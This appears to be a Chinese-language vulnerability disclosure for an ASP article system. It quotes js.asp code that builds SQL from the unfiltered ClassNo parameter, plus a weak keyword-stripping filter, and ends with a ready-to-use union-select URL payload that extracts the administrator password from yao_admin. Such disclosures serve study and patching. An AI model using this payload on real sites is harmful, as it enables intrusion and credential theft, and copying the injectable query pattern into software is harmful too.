漏洞等级：中等
漏洞说明：
漏洞出现在js.asp中，我们首先看源代码。


Code:

If CheckStr(Request("ClassNo")) <> "" then
ClassNo = split(CheckStr(Request("ClassNo")),"|")
'这里是获取变量利用checkstr过滤，但是感觉好像没起作用。然后分成数组
on error resume next
NClassID = LaoYRequest(ClassNo(0))
NClassID1 = LaoYRequest(ClassNo(1))
'获取数组1，与数组2进行整形过滤。这里没有漏洞
End if

num = LaoYRequest(request.querystring("num"))'这里num必须>=1
.......
set rs=server.createObject("Adodb.recordset")
sql = "Select top "& num &" ID,Title,TitleFontColor,Author,ClassID,DateAndTime,Hits,IsTop,IsHot from Yao_Article Where yn = 0"

If NclassID<>"" and NclassID1="" then
If Yao_MyID(NclassID)="0" then
SQL=SQL&" and ClassID="&NclassID&""
else
MyID = Replace(""&Yao_MyID(NclassID)&"","|",",")
SQL=SQL&" and ClassID in ("&MyID&")"
End if
elseif NclassID<>"" and NclassID1<>"" then
MyID = Replace(""&Request("ClassNo")&"","|",",")
SQL=SQL&" and ClassID in ("&MyID&")"
'这里出现的问题classno并没做其他过滤就写入到查询
End if

select case topType
case "new" sql=sql&" order by DateAndTime desc,ID desc"
case "hot" sql=sql&" order by hits desc,ID desc"
case "IsHot" sql=sql&" and IsHot = 1 order by ID desc"
end select

set rs = conn.execute(sql)
if rs.bof and rs.eof then
str=str+"没有符合条件的文章"
........



-------------------------------

function.asp


Code:
function CheckStr(str)
CheckStr=replace(replace(replace(replace(str,"<","<"),">",">"),chr(13),"")," ","")
CheckStr=replace(replace(replace(replace(CheckStr,"'",""),"and",""),"insert",""),"set","")
CheckStr=replace(replace(replace(replace(CheckStr,"select",""),"update",""),"delete",""),chr(34),"")
CheckStr=replace(replace(replace(replace(replace(CheckStr,"*",""),"=",""),"or",""),"mid",""),"count","")
end function


利用代码：
js.asp?num=1&ClassNo=1|1|1[SQL]
js.asp?num=1&ClassNo=1|1|1) union select 1,admin_pass,3,4,5,6,7,8,9 from yao_admin where id in(1 ####获取密码代码